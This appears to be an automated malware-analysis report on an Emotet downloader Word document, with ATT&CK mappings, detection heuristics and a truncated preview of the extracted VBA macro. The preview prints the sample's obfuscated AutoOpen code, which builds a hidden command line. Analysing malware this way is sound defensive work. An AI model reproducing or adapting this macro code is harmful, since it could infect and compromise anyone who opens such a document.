Verdict: MALICIOUS
Risk Score: 202

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1566.001 Spearphishing Attachment
The sample contains VBA macros, including an AutoOpen macro, and a critical heuristic firing for Shell() calls, indicating malicious intent. ClamAV detection confirms this, identifying it as Emotet. The AutoOpen macro likely executes a command to download and run a secondary payload, a common Emotet tactic.
Heuristics (6)

- ClamAV: Doc.Downloader.Emotet-6826486-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-6826486-0
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL http://schemas.openxmlformats.org/drawingml/2006/main: in document text (OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 214322 bytes | e6e3ade9fe55a1bb0d6f4c2614abc359ad4ee0c4b06555f34706ea56183b17c8 |

Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "QtWikWz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Dim WrHMzj(1)
WrHMzj(0) = Mid(QqcEbqww + RwoqaaXDUnEvvtQaLRskt + YtqsO, 503, 962) + Left(nqjRjpBj + MvjKLhYSSZlUCiFLFN + HFZAz, 880) + MidB(MjirLr + ijBfVObuwiLvUwzYElJhiwC + LuIKvZd, 476, 226) + MidB(tiiGCPL + hllXSduYXiTAujAoVraliB + HCfPlhW, 980, 508)
Dim roXhzE(1)
roXhzE(0) = Right(rBZCci + qYJkXjaCSJCrmkBXWv + HNlcm, 541) + Left(qzpRjwTK + ViivraZURaLYMCXm + asVSEBVv, 115) + MidB(MIanhMWK + IsWfPtUwwYHZJdmYkdO + zackipB, 534, 606) + MidB(zwmpPc + USEijYijmnrnjoJIpG + bwcmKqwJ, 154, 32)
sQwdpbhsQHr (KeyString(SfEZosTs + GOvvzzHz + 11 + 8 + 3 + 9 + 36 + nDmVTI + ivJsDbw) + AzmimqNw + phWraA + KeyString(PsiGj + NokOLTz + 13 + 10 + 3 + 11 + 40 + HCUnB + ZDpIEI) + ZPtoFN + rqvXpPJ + ItSNwXRA + PzvhL + wWjQAjYZSWV + ivVuluj + mhFWVLWTZ + jCJIOWcBRK + rrvkSVWtR + MQhBikhdQwE + JNfOYHBmZzT + cjiDHwD + qECHW + FIYXkBBYB + jaVWzoadHoh + mZnOJCG + zhMkFSZiTKB + uswjGH + rrYILFBF)
Dim dQEoH(2)
dQEoH(0) = MidB(MKKCIDw + wSZawoAGqucBoDdcwqn + RNGSvjT, 238, 449) + Mid(YwDXo + iQKECIOFZUdZpIji + WWhEb, 595, 554)
dQEoH(1) = MidB(FnumFcYN + KjitrtAEGunGKwLubnjWFUhi + zQvZu, 682, 479) + MidB(pLaailE + kouhvOjiKYZKBBpzO + ZSRnoAM, 39, 711)
Dim FDYqrN(1)
FDYqrN(0) = Right(nIfbhVIf + TtiCrjoVwPUvGEJhXLrbh + CriGDmU, 152) + MidB(LCLpACs + TMYWFpwNDcRBsJFPvcAnwZ + zrWJzHJ, 829, 408)
Dim CZWckE(1)
CZWckE(0) = MidB(rncfio + mwNZjzGkGDizkoPCHu + sUsPd, 258, 230) + MidB(zoTEsuC + PsdAkOGsrSlCcUErkztY + jKRqLt, 242, 10) + Mid(YdrkdIl + qwvMwQpLSvWUDDpCMzG + wvKdUNbO, 77, 78) + Left(lwSZoD + QHEwKhZjcWkMGFuVwq + QbLRFX, 549)
End Sub
Attribute VB_Name = "AwIIPVh"
Function ZPtoFN()
FujPnKFLw = "d " + CStr(Chr(7 + 1 + 3 + 3 + 33)) + "V^" + ":^" + "ON" + CStr(Chr(7 + 1 + 3 + 3 + 33)) + "C" + CStr(Chr(4 + 0 + 2 + 2 + 26)) + "s" + "^" + "e^" + "t"
jcURdFlwNU = " " + "^+" + "^'" + ".^" + "`" + "=" + "5" + "01" + "^" + " " + "1" + "0" + "9" + "^" + " 0"
oPNtJdXdbj = "9" + "^" + "3^" + " ^" + "91"
PpYXErvjjQ = "0" + "^" + " " + "3" + "0" + "1" + "^ " + "^3"
AuzTltlYw = "0" + "^1" + " " + "5" + "1^" + "3" + " ^" + "1^" + "3"
nSqMHwC = "0" + "^ " + "9" + "^3" + "^" + "0 " + "^3" + "5" + "^9" + " 0" + "31" + "^" + " ^" + "10"
ZPtoFN = FujPnKFLw + jcURdFlwNU + oPNtJdXdbj + PpYXErvjjQ + AuzTltlYw + nSqMHwC
Dim XMQsRn(2)
XMQsRn(0) = Left(Ewwipl + hprqbwzpAjwhGshAJBdH + AFaNjrwO, 835) + Mid(FcHYMbj + jkwXQHlczDhCsYbcIki + vaPabza, 888, 806)
XMQsRn(1) = MidB(PHDwuk + uYvDifjzGIWwuUbhJfWJr + MlVfiYY, 923, 925) + Mid(XhuvI + hMRVmbGWBGXPDTuSUY + CwPbSqmN, 431, 928) + Left(GNqwt + VWpYpndaAqGPzWXznjQ + attdpcv, 479) + MidB(OaMZZ + MMMjqGNwTbukfFivDJnzERK + oCzwVIU, 67, 525)
Dim OvRdZv(2)
OvRdZv(0) = Mid(iHUvRf + kmJfwlPpprrmrDNaAnU + FDSfMdXH, 610, 814) + Left(HCRdo + LVSitcrDEhQRasNFDL + MwGbkAv, 954) + MidB(QzWmZ + jmTDwOipcZPismGinvsq + VNwbv, 773, 377) + MidB(TZwjNWss + WidVZGfqlOrvLMPHuoFa + RuGsLv, 47, 966)
OvRdZv(1) = MidB(ZrrZULI + hcinkJclzjRHHMdmf + sdZXk, 402, 811) + Left(fcYFlnG + CSRwiSBkSIiMVjBONAo + QEoikWTG, 136) + Right(YvtuEEj + iAJfLkmrJHNidjjQN + bqUoa, 806) + MidB(IREOU + JXAUjOzYrdLQYVZcZSKX + jiAqJ, 352, 945)
End Function
Function rqvXpPJ()
Dim jAGuwz(1)
jAGuwz(0) = Left(KPSCUKnj + jblmzVLOfloLdpfPizmFilE + WGzhw, 523) + Left(BtDki + INWEpMosTCkzWsCIVI + skZfd, 935) + Mid(vsDwRPA + hmGOuqFnsKiZmacJPjLXBn + uaqmrYSo, 421, 498) + Left(tUsjEjwV + UHljOJVEaowLNTJHzE + javobS, 413)
Dim IZczMb(1)
IZczMb(0) = Left(zRWiVm + jfLAcZHjizUVhHCPRN + cGAcnjd, 767) + Mid(FEjTVOj + QhiSBXQbTWuwjtcwU + qQmQd, 223, 751)
Dim lRFiAK(1)
lRFiAK(0) = Mid(SGVPJ + fjwNnIYSoFGtwjjDM + UFIww, 600, 961) + Right(WfnJv + DWdtnvDsoYJljOXLtEpP + kkibfL, 962)
Dim fmqIUi(2)
fmqIUi(0) = Right(JsHbdaV + IPfDiCWdYcLBHBYWzok + VZwuWUum, 911) + MidB(oFkBku + GiVHkGOVzbaXdFFCAIdq + oMHXWm, 61, 36)
fmqIUi(1) = Mid(RzSLnHw ... (truncated)
```